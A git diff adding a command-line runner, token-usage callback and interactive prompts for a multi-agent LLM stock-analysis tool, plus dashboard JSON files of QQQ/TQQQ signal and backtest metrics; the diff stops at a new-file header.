risk_reports.append(("Neutral Analyst", risk["neutral_history"])) + if risk_reports: + console.print(Panel("[bold]IV. Risk Management Team Decision[/bold]", border_style="red")) + for title, content in risk_reports: + console.print(Panel(Markdown(content), title=title, border_style="blue", padding=(1, 2))) + + # V. Portfolio Manager Decision + if risk.get("judge_decision"): + console.print(Panel("[bold]V. Portfolio Manager Decision[/bold]", border_style="green")) + console.print(Panel(Markdown(risk["judge_decision"]), title="Portfolio Manager", border_style="blue", padding=(1, 2))) + + +def update_research_team_status(status): + """Update status for research team members (not Trader).""" + research_team = ["Bull Researcher", "Bear Researcher", "Research Manager"] + for agent in research_team: + message_buffer.update_agent_status(agent, status) + + +# Ordered list of analysts for status transitions +ANALYST_ORDER = ["market", "social", "news", "fundamentals"] +ANALYST_AGENT_NAMES = { + "market": "Market Analyst", + "social": "Social Analyst", + "news": "News Analyst", + "fundamentals": "Fundamentals Analyst", +} +ANALYST_REPORT_MAP = { + "market": "market_report", + "social": "sentiment_report", + "news": "news_report", + "fundamentals": "fundamentals_report", +} + + +def update_analyst_statuses(message_buffer, chunk): + """Update analyst statuses based on accumulated report state. + + Logic: + - Store new report content from the current chunk if present + - Check accumulated report_sections (not just current chunk) for status + - Analysts with reports = completed + - First analyst without report = in_progress + - Remaining analysts without reports = pending + - When all analysts done, set Bull Researcher to in_progress + """ + selected = message_buffer.selected_analysts + found_active = False + + for analyst_key in ANALYST_ORDER: + if analyst_key not in selected: + continue + + agent_name = ANALYST_AGENT_NAMES[analyst_key] + report_key = ANALYST_REPORT_MAP[analyst_key] + + # Capture new report content from current chunk + if chunk.get(report_key): + message_buffer.update_report_section(report_key, chunk[report_key]) + + # Determine status from accumulated sections, not just current chunk + has_report = bool(message_buffer.report_sections.get(report_key)) + + if has_report: + message_buffer.update_agent_status(agent_name, "completed") + elif not found_active: + message_buffer.update_agent_status(agent_name, "in_progress") + found_active = True + else: + message_buffer.update_agent_status(agent_name, "pending") + + # When all analysts complete, transition research team to in_progress + if not found_active and selected: + if message_buffer.agent_status.get("Bull Researcher") == "pending": + message_buffer.update_agent_status("Bull Researcher", "in_progress") + +def extract_content_string(content): + """Extract string content from various message formats. + Returns None if no meaningful text content is found. + """ + import ast + + def is_empty(val): + """Check if value is empty using Python's truthiness.""" + if val is None or val == '': + return True + if isinstance(val, str): + s = val.strip() + if not s: + return True + try: + return not bool(ast.literal_eval(s)) + except (ValueError, SyntaxError): + return False # Can't parse = real text + return not bool(val) + + if is_empty(content): + return None + + if isinstance(content, str): + return content.strip() + + if isinstance(content, dict): + text = content.get('text', '') + return text.strip() if not is_empty(text) else None + + if isinstance(content, list): + text_parts = [ + item.get('text', '').strip() if isinstance(item, dict) and item.get('type') == 'text' + else (item.strip() if isinstance(item, str) else '') + for item in content + ] + result = ' '.join(t for t in text_parts if t and not is_empty(t)) + return result if result else None + + return str(content).strip() if not is_empty(content) else None + + +def classify_message_type(message) -> tuple[str, str | None]: + """Classify LangChain message into display type and extract content. + + Returns: + (type, content) - type is one of: User, Agent, Data, Control + - content is extracted string or None + """ + from langchain_core.messages import AIMessage, HumanMessage, ToolMessage + + content = extract_content_string(getattr(message, 'content', None)) + + if isinstance(message, HumanMessage): + if content and content.strip() == "Continue": + return ("Control", content) + return ("User", content) + + if isinstance(message, ToolMessage): + return ("Data", content) + + if isinstance(message, AIMessage): + return ("Agent", content) + + # Fallback for unknown types + return ("System", content) + + +def format_tool_args(args, max_length=80) -> str: + """Format tool arguments for terminal display.""" + result = str(args) + if len(result) > max_length: + return result[:max_length - 3] + "..." + return result + +def run_analysis(): + # First get all user selections + selections = get_user_selections() + + # Create config with selected research depth + config = DEFAULT_CONFIG.copy() + config["max_debate_rounds"] = selections["research_depth"] + config["max_risk_discuss_rounds"] = selections["research_depth"] + config["quick_think_llm"] = selections["shallow_thinker"] + config["deep_think_llm"] = selections["deep_thinker"] + config["backend_url"] = selections["backend_url"] + config["llm_provider"] = selections["llm_provider"].lower() + # Provider-specific thinking configuration + config["google_thinking_level"] = selections.get("google_thinking_level") + config["openai_reasoning_effort"] = selections.get("openai_reasoning_effort") + config["anthropic_effort"] = selections.get("anthropic_effort") + config["output_language"] = selections.get("output_language", "English") + + # Create stats callback handler for tracking LLM/tool calls + stats_handler = StatsCallbackHandler() + + # Normalize analyst selection to predefined order (selection is a 'set', order is fixed) + selected_set = {analyst.value for analyst in selections["analysts"]} + selected_analyst_keys = [a for a in ANALYST_ORDER if a in selected_set] + + # Initialize the graph with callbacks bound to LLMs + graph = TradingAgentsGraph( + selected_analyst_keys, + config=config, + debug=True, + callbacks=[stats_handler], + ) + + # Initialize message buffer with selected analysts + message_buffer.init_for_analysis(selected_analyst_keys) + + # Track start time for elapsed display + start_time = time.time() + + # Create result directory + results_dir = Path(config["results_dir"]) / selections["ticker"] / selections["analysis_date"] + results_dir.mkdir(parents=True, exist_ok=True) + report_dir = results_dir / "reports" + report_dir.mkdir(parents=True, exist_ok=True) + log_file = results_dir / "message_tool.log" + log_file.touch(exist_ok=True) + + def save_message_decorator(obj, func_name): + func = getattr(obj, func_name) + @wraps(func) + def wrapper(*args, **kwargs): + func(*args, **kwargs) + timestamp, message_type, content = obj.messages[-1] + content = content.replace("\n", " ") # Replace newlines with spaces + with open(log_file, "a") as f: + f.write(f"{timestamp} [{message_type}] {content}\n") + return wrapper + + def save_tool_call_decorator(obj, func_name): + func = getattr(obj, func_name) + @wraps(func) + def wrapper(*args, **kwargs): + func(*args, **kwargs) + timestamp, tool_name, args = obj.tool_calls[-1] + args_str = ", ".join(f"{k}={v}" for k, v in args.items()) + with open(log_file, "a") as f: + f.write(f"{timestamp} [Tool Call] {tool_name}({args_str})\n") + return wrapper + + def save_report_section_decorator(obj, func_name): + func = getattr(obj, func_name) + @wraps(func) + def wrapper(section_name, content): + func(section_name, content) + if section_name in obj.report_sections and obj.report_sections[section_name] is not None: + content = obj.report_sections[section_name] + if content: + file_name = f"{section_name}.md" + text = "\n".join(str(item) for item in content) if isinstance(content, list) else content + with open(report_dir / file_name, "w") as f: + f.write(text) + return wrapper + + message_buffer.add_message = save_message_decorator(message_buffer, "add_message") + message_buffer.add_tool_call = save_tool_call_decorator(message_buffer, "add_tool_call") + message_buffer.update_report_section = save_report_section_decorator(message_buffer, "update_report_section") + + # Now start the display layout + layout = create_layout() + + with Live(layout, refresh_per_second=4) as live: + # Initial display + update_display(layout, stats_handler=stats_handler, start_time=start_time) + + # Add initial messages + message_buffer.add_message("System", f"Selected ticker: {selections['ticker']}") + message_buffer.add_message( + "System", f"Analysis date: {selections['analysis_date']}" + ) + message_buffer.add_message( + "System", + f"Selected analysts: {', '.join(analyst.value for analyst in selections['analysts'])}", + ) + update_display(layout, stats_handler=stats_handler, start_time=start_time) + + # Update agent status to in_progress for the first analyst + first_analyst = f"{selections['analysts'][0].value.capitalize()} Analyst" + message_buffer.update_agent_status(first_analyst, "in_progress") + update_display(layout, stats_handler=stats_handler, start_time=start_time) + + # Create spinner text + spinner_text = ( + f"Analyzing {selections['ticker']} on {selections['analysis_date']}..." + ) + update_display(layout, spinner_text, stats_handler=stats_handler, start_time=start_time) + + # Initialize state and get graph args with callbacks + init_agent_state = graph.propagator.create_initial_state( + selections["ticker"], selections["analysis_date"] + ) + # Pass callbacks to graph config for tool execution tracking + # (LLM tracking is handled separately via LLM constructor) + args = graph.propagator.get_graph_args(callbacks=[stats_handler]) + + # Stream the analysis + trace = [] + for chunk in graph.graph.stream(init_agent_state, **args): + # Process messages if present (skip duplicates via message ID) + if len(chunk["messages"]) > 0: + last_message = chunk["messages"][-1] + msg_id = getattr(last_message, "id", None) + + if msg_id != message_buffer._last_message_id: + message_buffer._last_message_id = msg_id + + # Add message to buffer + msg_type, content = classify_message_type(last_message) + if content and content.strip(): + message_buffer.add_message(msg_type, content) + + # Handle tool calls + if hasattr(last_message, "tool_calls") and last_message.tool_calls: + for tool_call in last_message.tool_calls: + if isinstance(tool_call, dict): + message_buffer.add_tool_call( + tool_call["name"], tool_call["args"] + ) + else: + message_buffer.add_tool_call(tool_call.name, tool_call.args) + + # Update analyst statuses based on report state (runs on every chunk) + update_analyst_statuses(message_buffer, chunk) + + # Research Team - Handle Investment Debate State + if chunk.get("investment_debate_state"): + debate_state = chunk["investment_debate_state"] + bull_hist = debate_state.get("bull_history", "").strip() + bear_hist = debate_state.get("bear_history", "").strip() + judge = debate_state.get("judge_decision", "").strip() + + # Only update status when there's actual content + if bull_hist or bear_hist: + update_research_team_status("in_progress") + if bull_hist: + message_buffer.update_report_section( + "investment_plan", f"### Bull Researcher Analysis\n{bull_hist}" + ) + if bear_hist: + message_buffer.update_report_section( + "investment_plan", f"### Bear Researcher Analysis\n{bear_hist}" + ) + if judge: + message_buffer.update_report_section( + "investment_plan", f"### Research Manager Decision\n{judge}" + ) + update_research_team_status("completed") + message_buffer.update_agent_status("Trader", "in_progress") + + # Trading Team + if chunk.get("trader_investment_plan"): + message_buffer.update_report_section( + "trader_investment_plan", chunk["trader_investment_plan"] + ) + if message_buffer.agent_status.get("Trader") != "completed": + message_buffer.update_agent_status("Trader", "completed") + message_buffer.update_agent_status("Aggressive Analyst", "in_progress") + + # Risk Management Team - Handle Risk Debate State + if chunk.get("risk_debate_state"): + risk_state = chunk["risk_debate_state"] + agg_hist = risk_state.get("aggressive_history", "").strip() + con_hist = risk_state.get("conservative_history", "").strip() + neu_hist = risk_state.get("neutral_history", "").strip() + judge = risk_state.get("judge_decision", "").strip() + + if agg_hist: + if message_buffer.agent_status.get("Aggressive Analyst") != "completed": + message_buffer.update_agent_status("Aggressive Analyst", "in_progress") + message_buffer.update_report_section( + "final_trade_decision", f"### Aggressive Analyst Analysis\n{agg_hist}" + ) + if con_hist: + if message_buffer.agent_status.get("Conservative Analyst") != "completed": + message_buffer.update_agent_status("Conservative Analyst", "in_progress") + message_buffer.update_report_section( + "final_trade_decision", f"### Conservative Analyst Analysis\n{con_hist}" + ) + if neu_hist: + if message_buffer.agent_status.get("Neutral Analyst") != "completed": + message_buffer.update_agent_status("Neutral Analyst", "in_progress") + message_buffer.update_report_section( + "final_trade_decision", f"### Neutral Analyst Analysis\n{neu_hist}" + ) + if judge: + if message_buffer.agent_status.get("Portfolio Manager") != "completed": + message_buffer.update_agent_status("Portfolio Manager", "in_progress") + message_buffer.update_report_section( + "final_trade_decision", f"### Portfolio Manager Decision\n{judge}" + ) + message_buffer.update_agent_status("Aggressive Analyst", "completed") + message_buffer.update_agent_status("Conservative Analyst", "completed") + message_buffer.update_agent_status("Neutral Analyst", "completed") + message_buffer.update_agent_status("Portfolio Manager", "completed") + + # Update the display + update_display(layout, stats_handler=stats_handler, start_time=start_time) + + trace.append(chunk) + + # Get final state and decision + final_state = trace[-1] + decision = graph.process_signal(final_state["final_trade_decision"]) + + # Update all agent statuses to completed + for agent in message_buffer.agent_status: + message_buffer.update_agent_status(agent, "completed") + + message_buffer.add_message( + "System", f"Completed analysis for {selections['analysis_date']}" + ) + + # Update final report sections + for section in message_buffer.report_sections.keys(): + if section in final_state: + message_buffer.update_report_section(section, final_state[section]) + + update_display(layout, stats_handler=stats_handler, start_time=start_time) + + # Post-analysis prompts (outside Live context for clean interaction) + console.print("\n[bold cyan]Analysis Complete![/bold cyan]\n") + + # Prompt to save report + save_choice = typer.prompt("Save report?", default="Y").strip().upper() + if save_choice in ("Y", "YES", ""): + timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S") + default_path = Path.cwd() / "reports" / f"{selections['ticker']}_{timestamp}" + save_path_str = typer.prompt( + "Save path (press Enter for default)", + default=str(default_path) + ).strip() + save_path = Path(save_path_str) + try: + report_file = save_report_to_disk(final_state, selections["ticker"], save_path) + console.print(f"\n[green]✓ Report saved to:[/green] {save_path.resolve()}") + console.print(f" [dim]Complete report:[/dim] {report_file.name}") + except Exception as e: + console.print(f"[red]Error saving report: {e}[/red]") + + # Prompt to display full report + display_choice = typer.prompt("\nDisplay full report on screen?", default="Y").strip().upper() + if display_choice in ("Y", "YES", ""): + display_complete_report(final_state) + + +@app.command() +def analyze(): + run_analysis() + + +if __name__ == "__main__": + app() diff --git a/cli/models.py b/cli/models.py new file mode 100644 index 0000000..f68c3da --- /dev/null +++ b/cli/models.py @@ -0,0 +1,10 @@ +from enum import Enum +from typing import List, Optional, Dict +from pydantic import BaseModel + + +class AnalystType(str, Enum): + MARKET = "market" + SOCIAL = "social" + NEWS = "news" + FUNDAMENTALS = "fundamentals" diff --git a/cli/static/welcome.txt b/cli/static/welcome.txt new file mode 100644 index 0000000..f2cf641 --- /dev/null +++ b/cli/static/welcome.txt @@ -0,0 +1,7 @@ + + ______ ___ ___ __ + /_ __/________ _____/ (_)___ ____ _/ | ____ ____ ____ / /______ + / / / ___/ __ `/ __ / / __ \/ __ `/ /| |/ __ `/ _ \/ __ \/ __/ ___/ + / / / / / /_/ / /_/ / / / / / /_/ / ___ / /_/ / __/ / / / /_(__ ) +/_/ /_/ \__,_/\__,_/_/_/ /_/\__, /_/ |_\__, /\___/_/ /_/\__/____/ + /____/ /____/ diff --git a/cli/stats_handler.py b/cli/stats_handler.py new file mode 100644 index 0000000..e645c8f --- /dev/null +++ b/cli/stats_handler.py @@ -0,0 +1,119 @@ +import threading +from typing import Any, Dict, List, Optional, Tuple + +from langchain_core.callbacks import BaseCallbackHandler +from langchain_core.outputs import LLMResult +from langchain_core.messages import AIMessage + + +def _pick_int(d: Optional[Dict[str, Any]], *keys: str) -> int: + if not d: + return 0 + for k in keys: + v = d.get(k) + if v is not None: + try: + return int(v) + except (TypeError, ValueError): + continue + return 0 + + +def _extract_tokens_from_usage_dict(u: Dict[str, Any]) -> Tuple[int, int]: + """兼容 OpenAI / Anthropic / Gemini 等字段命名。""" + tin = _pick_int(u, "input_tokens", "prompt_tokens", "cache_read_input_tokens") + tout = _pick_int(u, "output_tokens", "completion_tokens", "candidates_token_count") + return tin, tout + + +class StatsCallbackHandler(BaseCallbackHandler): + """Callback handler that tracks LLM calls, tool calls, and token usage.""" + + def __init__(self) -> None: + super().__init__() + self._lock = threading.Lock() + self.llm_calls = 0 + self.tool_calls = 0 + self.tokens_in = 0 + self.tokens_out = 0 + + def on_llm_start( + self, + serialized: Dict[str, Any], + prompts: List[str], + **kwargs: Any, + ) -> None: + """Increment LLM call counter when an LLM starts.""" + with self._lock: + self.llm_calls += 1 + + def on_chat_model_start( + self, + serialized: Dict[str, Any], + messages: List[List[Any]], + **kwargs: Any, + ) -> None: + """Increment LLM call counter when a chat model starts.""" + with self._lock: + self.llm_calls += 1 + + def on_llm_end(self, response: LLMResult, **kwargs: Any) -> None: + """Extract token usage from LLM response.""" + tin, tout = 0, 0 + try: + generation = response.generations[0][0] + except (IndexError, TypeError): + generation = None + + if generation is not None and hasattr(generation, "message"): + message = generation.message + if isinstance(message, AIMessage): + if hasattr(message, "usage_metadata") and message.usage_metadata: + um = message.usage_metadata + if isinstance(um, dict): + tin = _pick_int(um, "input_tokens", "prompt_tokens") + tout = _pick_int(um, "output_tokens", "completion_tokens") + if tin == 0 and tout == 0 and hasattr(message, "response_metadata"): + rm = message.response_metadata or {} + u = rm.get("token_usage") or rm.get("usage_metadata") or rm.get("usage") + if isinstance(u, dict): + tin, tout = _extract_tokens_from_usage_dict(u) + + if tin == 0 and tout == 0 and generation is not None: + gen_info = getattr(generation, "generation_info", None) or {} + if isinstance(gen_info, dict): + u = gen_info.get("token_usage") or gen_info.get("usage") + if isinstance(u, dict): + tin, tout = _extract_tokens_from_usage_dict(u) + + if tin == 0 and tout == 0: + llm_out = getattr(response, "llm_output", None) + if isinstance(llm_out, dict): + u = llm_out.get("token_usage") or llm_out.get("usage") + if isinstance(u, dict): + tin, tout = _extract_tokens_from_usage_dict(u) + + if tin or tout: + with self._lock: + self.tokens_in += tin + self.tokens_out += tout + + def on_tool_start( + self, + serialized: Dict[str, Any], + input_str: str, + **kwargs: Any, + ) -> None: + """Increment tool call counter when a tool starts.""" + with self._lock: + self.tool_calls += 1 + + def get_stats(self) -> Dict[str, Any]: + """Return current statistics.""" + with self._lock: + return { + "llm_calls": self.llm_calls, + "tool_calls": self.tool_calls, + "tokens_in": self.tokens_in, + "tokens_out": self.tokens_out, + } diff --git a/cli/utils.py b/cli/utils.py new file mode 100644 index 0000000..4ce6f17 --- /dev/null +++ b/cli/utils.py @@ -0,0 +1,318 @@ +import questionary +from typing import List, Optional, Tuple, Dict + +from rich.console import Console + +from cli.models import AnalystType +from tradingagents.llm_clients.model_catalog import get_model_options + +console = Console() + +TICKER_INPUT_EXAMPLES = "Examples: SPY, CNC.TO, 7203.T, 0700.HK" + +ANALYST_ORDER = [ + ("Market Analyst", AnalystType.MARKET), + ("Social Media Analyst", AnalystType.SOCIAL), + ("News Analyst", AnalystType.NEWS), + ("Fundamentals Analyst", AnalystType.FUNDAMENTALS), +] + + +def get_ticker() -> str: + """Prompt the user to enter a ticker symbol.""" + ticker = questionary.text( + f"Enter the exact ticker symbol to analyze ({TICKER_INPUT_EXAMPLES}):", + validate=lambda x: len(x.strip()) > 0 or "Please enter a valid ticker symbol.", + style=questionary.Style( + [ + ("text", "fg:green"), + ("highlighted", "noinherit"), + ] + ), + ).ask() + + if not ticker: + console.print("\n[red]No ticker symbol provided. Exiting...[/red]") + exit(1) + + return normalize_ticker_symbol(ticker) + + +def normalize_ticker_symbol(ticker: str) -> str: + """Normalize ticker input while preserving exchange suffixes.""" + return ticker.strip().upper() + + +def get_analysis_date() -> str: + """Prompt the user to enter a date in YYYY-MM-DD format.""" + import re + from datetime import datetime + + def validate_date(date_str: str) -> bool: + if not re.match(r"^\d{4}-\d{2}-\d{2}$", date_str): + return False + try: + datetime.strptime(date_str, "%Y-%m-%d") + return True + except ValueError: + return False + + date = questionary.text( + "Enter the analysis date (YYYY-MM-DD):", + validate=lambda x: validate_date(x.strip()) + or "Please enter a valid date in YYYY-MM-DD format.", + style=questionary.Style( + [ + ("text", "fg:green"), + ("highlighted", "noinherit"), + ] + ), + ).ask() + + if not date: + console.print("\n[red]No date provided. Exiting...[/red]") + exit(1) + + return date.strip() + + +def select_analysts() -> List[AnalystType]: + """Select analysts using an interactive checkbox.""" + choices = questionary.checkbox( + "Select Your [Analysts Team]:", + choices=[ + questionary.Choice(display, value=value) for display, value in ANALYST_ORDER + ], + instruction="\n- Press Space to select/unselect analysts\n- Press 'a' to select/unselect all\n- Press Enter when done", + validate=lambda x: len(x) > 0 or "You must select at least one analyst.", + style=questionary.Style( + [ + ("checkbox-selected", "fg:green"), + ("selected", "fg:green noinherit"), + ("highlighted", "noinherit"), + ("pointer", "noinherit"), + ] + ), + ).ask() + + if not choices: + console.print("\n[red]No analysts selected. Exiting...[/red]") + exit(1) + + return choices + + +def select_research_depth() -> int: + """Select research depth using an interactive selection.""" + + # Define research depth options with their corresponding values + DEPTH_OPTIONS = [ + ("Shallow - Quick research, few debate and strategy discussion rounds", 1), + ("Medium - Middle ground, moderate debate rounds and strategy discussion", 3), + ("Deep - Comprehensive research, in depth debate and strategy discussion", 5), + ] + + choice = questionary.select( + "Select Your [Research Depth]:", + choices=[ + questionary.Choice(display, value=value) for display, value in DEPTH_OPTIONS + ], + instruction="\n- Use arrow keys to navigate\n- Press Enter to select", + style=questionary.Style( + [ + ("selected", "fg:yellow noinherit"), + ("highlighted", "fg:yellow noinherit"), + ("pointer", "fg:yellow noinherit"), + ] + ), + ).ask() + + if choice is None: + console.print("\n[red]No research depth selected. Exiting...[/red]") + exit(1) + + return choice + + +def select_shallow_thinking_agent(provider) -> str: + """Select shallow thinking llm engine using an interactive selection.""" + + choice = questionary.select( + "Select Your [Quick-Thinking LLM Engine]:", + choices=[ + questionary.Choice(display, value=value) + for display, value in get_model_options(provider, "quick") + ], + instruction="\n- Use arrow keys to navigate\n- Press Enter to select", + style=questionary.Style( + [ + ("selected", "fg:magenta noinherit"), + ("highlighted", "fg:magenta noinherit"), + ("pointer", "fg:magenta noinherit"), + ] + ), + ).ask() + + if choice is None: + console.print( + "\n[red]No shallow thinking llm engine selected. Exiting...[/red]" + ) + exit(1) + + return choice + + +def select_deep_thinking_agent(provider) -> str: + """Select deep thinking llm engine using an interactive selection.""" + + choice = questionary.select( + "Select Your [Deep-Thinking LLM Engine]:", + choices=[ + questionary.Choice(display, value=value) + for display, value in get_model_options(provider, "deep") + ], + instruction="\n- Use arrow keys to navigate\n- Press Enter to select", + style=questionary.Style( + [ + ("selected", "fg:magenta noinherit"), + ("highlighted", "fg:magenta noinherit"), + ("pointer", "fg:magenta noinherit"), + ] + ), + ).ask() + + if choice is None: + console.print("\n[red]No deep thinking llm engine selected. Exiting...[/red]") + exit(1) + + return choice + +def select_llm_provider() -> tuple[str, str]: + """Select the OpenAI api url using interactive selection.""" + # Define OpenAI api options with their corresponding endpoints + BASE_URLS = [ + ("OpenAI", "https://api.openai.com/v1"), + ("SiliconFlow", "https://api.siliconflow.cn/v1"), + ("Google", "https://generativelanguage.googleapis.com/v1"), + ("Anthropic", "https://api.anthropic.com/"), + ("xAI", "https://api.x.ai/v1"), + ("Openrouter", "https://openrouter.ai/api/v1"), + ("Ollama", "http://localhost:11434/v1"), + ] + + choice = questionary.select( + "Select your LLM Provider:", + choices=[ + questionary.Choice(display, value=(display, value)) + for display, value in BASE_URLS + ], + instruction="\n- Use arrow keys to navigate\n- Press Enter to select", + style=questionary.Style( + [ + ("selected", "fg:magenta noinherit"), + ("highlighted", "fg:magenta noinherit"), + ("pointer", "fg:magenta noinherit"), + ] + ), + ).ask() + + if choice is None: + console.print("\n[red]no OpenAI backend selected. Exiting...[/red]") + exit(1) + + display_name, url = choice + print(f"You selected: {display_name}\tURL: {url}") + + return display_name, url + + +def ask_openai_reasoning_effort() -> str: + """Ask for OpenAI reasoning effort level.""" + choices = [ + questionary.Choice("Medium (Default)", "medium"), + questionary.Choice("High (More thorough)", "high"), + questionary.Choice("Low (Faster)", "low"), + ] + return questionary.select( + "Select Reasoning Effort:", + choices=choices, + style=questionary.Style([ + ("selected", "fg:cyan noinherit"), + ("highlighted", "fg:cyan noinherit"), + ("pointer", "fg:cyan noinherit"), + ]), + ).ask() + + +def ask_anthropic_effort() -> str | None: + """Ask for Anthropic effort level. + + Controls token usage and response thoroughness on Claude 4.5+ and 4.6 models. + """ + return questionary.select( + "Select Effort Level:", + choices=[ + questionary.Choice("High (recommended)", "high"), + questionary.Choice("Medium (balanced)", "medium"), + questionary.Choice("Low (faster, cheaper)", "low"), + ], + style=questionary.Style([ + ("selected", "fg:cyan noinherit"), + ("highlighted", "fg:cyan noinherit"), + ("pointer", "fg:cyan noinherit"), + ]), + ).ask() + + +def ask_gemini_thinking_config() -> str | None: + """Ask for Gemini thinking configuration. + + Returns thinking_level: "high" or "minimal". + Client maps to appropriate API param based on model series. + """ + return questionary.select( + "Select Thinking Mode:", + choices=[ + questionary.Choice("Enable Thinking (recommended)", "high"), + questionary.Choice("Minimal/Disable Thinking", "minimal"), + ], + style=questionary.Style([ + ("selected", "fg:green noinherit"), + ("highlighted", "fg:green noinherit"), + ("pointer", "fg:green noinherit"), + ]), + ).ask() + + +def ask_output_language() -> str: + """Ask for report output language.""" + choice = questionary.select( + "Select Output Language:", + choices=[ + questionary.Choice("English (default)", "English"), + questionary.Choice("Chinese (中文)", "Chinese"), + questionary.Choice("Japanese (日本語)", "Japanese"), + questionary.Choice("Korean (한국어)", "Korean"), + questionary.Choice("Hindi (हिन्दी)", "Hindi"), + questionary.Choice("Spanish (Español)", "Spanish"), + questionary.Choice("Portuguese (Português)", "Portuguese"), + questionary.Choice("French (Français)", "French"), + questionary.Choice("German (Deutsch)", "German"), + questionary.Choice("Arabic (العربية)", "Arabic"), + questionary.Choice("Russian (Русский)", "Russian"), + questionary.Choice("Custom language", "custom"), + ], + style=questionary.Style([ + ("selected", "fg:yellow noinherit"), + ("highlighted", "fg:yellow noinherit"), + ("pointer", "fg:yellow noinherit"), + ]), + ).ask() + + if choice == "custom": + return questionary.text( + "Enter language name (e.g. Turkish, Vietnamese, Thai, Indonesian):", + validate=lambda x: len(x.strip()) > 0 or "Please enter a language name.", + ).ask().strip() + + return choice diff --git a/data/dashboard/strategy/base_signal.json b/data/dashboard/strategy/base_signal.json new file mode 100644 index 0000000..f4bd647 --- /dev/null +++ b/data/dashboard/strategy/base_signal.json @@ -0,0 +1,26 @@ +{ + "close_val": 633.1801147460938, + "ma200_val": 596.570202331543, + "ma50_val": 600.1725512695313, + "a1_pass": true, + "a1_metric": "QQQ = 633.18 | MA200 = 596.57", + "a1_verdict": "日收盘价已站上 200 日均线,信号有效。", + "a2_score": 1, + "a2_metric": "MA200 变化:过去 20 个交易日 +1.07%(Rising)", + "a2_verdict": "过去 20 个交易日上升 +1.07%,斜率向上 — 通过。", + "a3_pass": true, + "a3_metric": "连续 6 日收盘站上 MA200(至少需要 3 日)", + "a3_verdict": "连续 3 日以上收盘站上 MA200,突破有效。", + "b1_pass": false, + "b1_metric": "Breakout vol: 63.1M | 20d avg: 66.6M | Ratio: 0.95x", + "b1_verdict": "成交量低于均值,突破力度偏弱,建议减仓 25%。", + "b2_pass": true, + "b2_metric": "QQQ = 633.18 | MA50 = 600.17 | MA200 = 596.57", + "b2_verdict": "价格 > MA50 > MA200 — 黄金交叉区间(强势)", + "b3_pass": false, + "days_since": 5, + "cross_count": 1, + "cross_idx": "2026-04-08", + "signal_quality": "Weak", + "_updated_at": "2026-04-16 01:31:58" +} \ No newline at end of file diff --git a/data/dashboard/strategy/base_signal_chart1.png b/data/dashboard/strategy/base_signal_chart1.png new file mode 100644 index 0000000..f4915a2 Binary files /dev/null and b/data/dashboard/strategy/base_signal_chart1.png differ diff --git a/data/dashboard/strategy/base_signal_chart2.png b/data/dashboard/strategy/base_signal_chart2.png new file mode 100644 index 0000000..7dfd32f Binary files /dev/null and b/data/dashboard/strategy/base_signal_chart2.png differ diff --git a/data/dashboard/strategy/macro.json b/data/dashboard/strategy/macro.json new file mode 100644 index 0000000..c144187 --- /dev/null +++ b/data/dashboard/strategy/macro.json @@ -0,0 +1,10 @@ +{ + "macro_score_1": 1.0, + "macro_score_2": 1.0, + "macro_score_3": 1.0, + "macro_score_4": 1.0, + "macro_score_5": 1.0, + "macro_score_total": 5.0, + "macro_tested": true, + "_updated_at": "2026-04-26 03:28:14" +} \ No newline at end of file diff --git a/data/dashboard/strategy/macro_chart12_1.png b/data/dashboard/strategy/macro_chart12_1.png new file mode 100644 index 0000000..89b4400 Binary files /dev/null and b/data/dashboard/strategy/macro_chart12_1.png differ diff --git a/data/dashboard/strategy/macro_chart12_2.png b/data/dashboard/strategy/macro_chart12_2.png new file mode 100644 index 0000000..2ef0ce3 Binary files /dev/null and b/data/dashboard/strategy/macro_chart12_2.png differ diff --git a/data/dashboard/strategy/macro_chart3.png b/data/dashboard/strategy/macro_chart3.png new file mode 100644 index 0000000..dc4e0f9 Binary files /dev/null and b/data/dashboard/strategy/macro_chart3.png differ diff --git a/data/dashboard/strategy/macro_chart4.png b/data/dashboard/strategy/macro_chart4.png new file mode 100644 index 0000000..a417c23 Binary files /dev/null and b/data/dashboard/strategy/macro_chart4.png differ diff --git a/data/dashboard/strategy/macro_chart5.png b/data/dashboard/strategy/macro_chart5.png new file mode 100644 index 0000000..104e3e2 Binary files /dev/null and b/data/dashboard/strategy/macro_chart5.png differ diff --git a/data/dashboard/strategy/risk.json b/data/dashboard/strategy/risk.json new file mode 100644 index 0000000..e967ee8 --- /dev/null +++ b/data/dashboard/strategy/risk.json @@ -0,0 +1,18 @@ +{ + "total_cash": 19000.0, + "tqqq_price": 54.61989974975586, + "macro_score": 4, + "ceiling_pct": 1.0, + "deployable": 19000.0, + "quality_adj": 0.75, + "deployable_adj": 14250.0, + "direct_alloc": 4750.0, + "wheel_margin": 4750.0, + "shares": 86, + "actual_cost": 4697.311378479004, + "put_contracts": 0, + "reserve_cash": 14302.688621520996, + "entry_mode": "Split", + "signal_quality": "Weak", + "_updated_at": "2026-04-15 23:27:11" +} \ No newline at end of file diff --git a/data/dashboard/strategy/validation.json b/data/dashboard/strategy/validation.json new file mode 100644 index 0000000..af2868d --- /dev/null +++ b/data/dashboard/strategy/validation.json @@ -0,0 +1,11 @@ +{ + "cross_idx": "2026-04-08", + "cross_price": 48.0, + "current_price": 54.67499923706055, + "distance_pct": 13.906248410542807, + "entry_mode": "Split", + "mode_detail": "1/3 直接买入 + 1/3 Sell Put + 1/3 预留", + "rationale": "距离 13.9% — TQQQ 已有一定涨幅,分批入场降低追高风险。", + "macro_score": 5.0, + "_updated_at": "2026-04-16 01:34:30" +} \ No newline at end of file diff --git a/data/dashboard/strategy/validation_chart.png b/data/dashboard/strategy/validation_chart.png new file mode 100644 index 0000000..d8bdfb8 Binary files /dev/null and b/data/dashboard/strategy/validation_chart.png differ diff --git a/data/dashboard/wheel/aggressive_latest.json b/data/dashboard/wheel/aggressive_latest.json new file mode 100644 index 0000000..6a46864 --- /dev/null +++ b/data/dashboard/wheel/aggressive_latest.json @@ -0,0 +1,21 @@ +{ + "start": "2025-04-24", + "end": "2026-04-24", + "metrics": { + "total_return": 13.034483512918182, + "final_value": 11303.448351291818, + "cagr": 13.082052914455588, + "sharpe": 2.8013245352313114, + "max_dd": -2.075202619162914, + "n_trades": 33, + "wins": 31, + "losses": 2, + "win_rate": 93.93939393939394, + "avg_win": 28.028074659204595, + "avg_loss": -287.9317604510027, + "chain_quotes": 0, + "bs_quotes": 86 + }, + "n_trades": 33, + "_updated_at": "2026-04-24 16:21:43" +} \ No newline at end of file diff --git a/data/dashboard/wheel/soxl_wheel_aggressive_latest.json b/data/dashboard/wheel/soxl_wheel_aggressive_latest.json new file mode 100644 index 0000000..a897327 --- /dev/null +++ 